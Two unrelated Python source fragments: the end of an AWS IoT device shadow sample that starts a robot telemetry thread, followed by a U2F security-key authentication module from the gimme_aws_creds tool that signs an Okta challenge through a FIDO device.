the sample runs asyncronously. # Issue request for shadow's current state. # The response will be received by the on_get_accepted() callback # print("Requesting current shadow state...") publish_get_future = self.shadow_client.publish_get_shadow( request=iotshadow.GetShadowRequest(args.thing_name), qos=mqtt.QoS.AT_LEAST_ONCE) # Ensure that publish succeeds publish_get_future.result() # Launch thread to handle user input. # A "daemon" thread won't prevent the program from shutting down. # print("Launching thread to read user input...") # user_input_thread = threading.Thread(target=user_input_thread_fn, name='user_input_thread') # user_input_thread.daemon = True # user_input_thread.start() # Launch thread to send telemetry updates to shadow self.telemetry_thread = threading.Thread( target=self.get_robot_telemetry, name='Robot Telemetry Thread', args=(args.robot_url, args.robot_ca) ) # self.telemetry_thread.daemon = True self.telemetry_thread.start() except Exception as e: self.exit(e) # Wait for the sample to finish (user types 'quit', or an error occurs) self.is_sample_done.wait() if __name__ == '__main__': # Process input args args = parser.parse_args() sq = queue.Queue() s = ShadowOps(args, sq)
u2f.py
""" Copyright 2018-present SYNETIS. Licensed under the Apache License, Version 2.0 (the "License"); You may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and* limitations under the License.* """ from __future__ import print_function, absolute_import, unicode_literals import base64 import json import time from threading import Event, Thread from fido2.ctap1 import APDU from fido2.ctap1 import ApduError from fido2.ctap1 import CTAP1 from fido2.hid import CtapHidDevice from fido2.utils import sha256 from gimme_aws_creds.errors import NoFIDODeviceFoundError, FIDODeviceTimeoutError, FIDODeviceError class FactorU2F(object): def __init__(self, ui, appId, nonce, credentialId): """ :param appId: Base URL string for Okta IDP e.g. https://xxxx.okta.com' :param nonce: nonce :param credentialid: credentialid """ self.ui = ui self._clients = None self._has_prompted = False self._cancel = Event() self._credentialId = base64.urlsafe_b64decode(credentialId) self._appId = sha256(appId.encode()) self._version = 'U2F_V2' self._signature = None self._clientData = json.dumps({ "challenge": nonce, "origin": appId, "typ": "navigator.id.getAssertion" }).encode() self._nonce = sha256(self._clientData) def locate_device(self): # Locate a device devs = list(CtapHidDevice.list_devices()) if not devs: self.ui.info("No FIDO device found") raise NoFIDODeviceFoundError self._clients = [CTAP1(d) for d in devs] def work(self, client): for _ in range(30): try: self._signature = client.authenticate( self._nonce, self._appId, self._credentialId ) except ApduError as e: if e.code == APDU.USE_NOT_SATISFIED: if not self._has_prompted: self.ui.info('\nTouch your authenticator device now...\n') self._has_prompted = True time.sleep(0.5) continue else: raise FIDODeviceError break if self._signature is None: raise FIDODeviceError self._cancel.set() def verify(self): # If authenticator is not found, prompt try: self.locate_device() except NoFIDODeviceFoundError: self.ui.input('Please insert your security key and press enter...') self.locate_device() threads = [] for client in self._clients: t = Thread(target=self.work, args=(client,)) threads.append(t) t.start() for t in threads: t.join() if not self._cancel.is_set(): self.ui.info('Operation timed out or no valid Security Key found !') raise FIDODeviceTimeoutError return self._clientData, self._signature